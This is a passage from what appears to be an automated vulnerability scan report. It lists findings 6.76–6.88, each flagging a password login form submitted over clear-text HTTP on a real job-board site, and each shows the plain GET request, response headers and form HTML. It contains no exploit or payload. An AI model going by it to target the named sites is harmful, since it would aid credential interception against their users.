rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.76. http://www.manufacturingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manufacturingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.manufacturingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=5ot5i4vicpofvo6i92rqjh7uc5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121467

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.manufacturingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.77. http://www.marketingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marketingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.marketingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:40 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=mv80mss0p40gngko1vhkar5f43; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 131870

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.marketingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.78. http://www.mediajobcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediajobcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.mediajobcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:20 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bppv1icf1cusbde0ltp6efc6u0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:20 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122753

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.mediajobcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.79. http://www.medicalschoolloans.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.medicalschoolloans.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.medicalschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:49 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=p6p8q6ke8luivjdor0r4lolo34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92734

<script language="javascript" type="text/javascript" src="http://www.medicalschoolloans.com/script/overlibmws.js"></script>
<script language="javascript" type="text/javascript" src="http://www.medical
...[SNIP]...
<table width="100%" cellpadding="0" cellspacing="0" border="0" style="background-color:#f8f8f8;">
                   <form action="/index.php" name="formaccountlogin" method="post">
   <tr>
...[SNIP]...
<td><input type="password" name="clsregistration_password" class="inputbox" value="Password" onclick="emptytxtboxpassword();"></td>
...[SNIP]...

6.80. http://www.militarycrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.militarycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.militarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:30 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a4ria9ol92rvm2rjro93htql36; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:30 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104750

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.militarycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.81. http://www.nursingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nursingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.nursingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:57 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=t4okj4bg6oif378439t4l99v56; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:58 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104463

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.nursingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.82. http://www.occupationaltherapycrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.occupationaltherapycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.occupationaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:24 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a2a5vtclildmv21469nm7krd85; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106436

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.occupationaltherapycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.83. http://www.operationscrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.operationscrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.operationscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:02 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pb54cpbbhj2rk90gr90bf4h334; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118168

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.operationscrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.84. http://www.parttimecrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.parttimecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.parttimecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ij1mnbg5ljm83h4g6kns0vi4c5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 110601

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.parttimecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.85. http://www.pharmaceuticalcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pharmaceuticalcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.pharmaceuticalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kufoga5sm934qb7mfhn708np70; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119431

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.pharmaceuticalcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.86. http://www.physicalsecuritycrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.physicalsecuritycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.physicalsecuritycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gi8upuba219celoic2370527h4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106914

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.physicalsecuritycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.87. http://www.physicaltherapycrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.physicaltherapycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.physicaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:16 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=05qenp73ui9sja89hqooo6u8d1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:16 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116104

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.physicaltherapycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.88. http://www.planningcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.planningcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.planningcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:11 GMT
Server: Apache/2.2.3 (Red Hat)
